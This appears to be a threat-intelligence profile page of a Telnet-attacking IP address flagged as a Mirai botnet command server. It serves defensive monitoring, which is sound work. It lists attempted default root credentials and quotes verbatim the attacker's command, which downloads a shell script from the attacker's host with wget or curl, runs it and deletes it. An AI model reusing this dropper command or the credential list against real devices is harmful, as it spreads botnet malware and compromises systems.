TROYANOSYVIRUS
Aktive BedrohungNIEDRIG

87.121.79.23

Erste Erkennung28.3.2026
Letzte Aktivitat6.4.2026
ISP03AI LTD
🎯
29
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
2
Malware

Geolokalisierung

Land
🇬🇧 Reino Unido
Stadt
Unbekannt
ASN
AS213725
ISP
03AI LTD

Angriffsarten

ssh_telnet_honeypot

Angegriffene Ports

23

Zugehorige Malware

Versuchte Anmeldedaten

🔐root/(leer)
2x
🔐root/admin
2x
🔐root/root
1x
🔐root/123456
1x

Ausgefuhrte Befehle

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://87.121.79.23/zato.sh -O z || curl -fs http://87.121.79.23/zato.sh -o z; chmod +x z; ./z; rm -f z2x

ThreatFox Intelabuse.ch

⚠️BEKANNTER C2-SERVER
Malware-Familien
elf.mirai
Bedrohungstypen
botnet_cc
Zuverlassigkeit: 100%

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Ports
21135445
Schwachstellen
CVE-2020-0796

Risikobewertung

35
/100
NiedrigMittelHochKritisch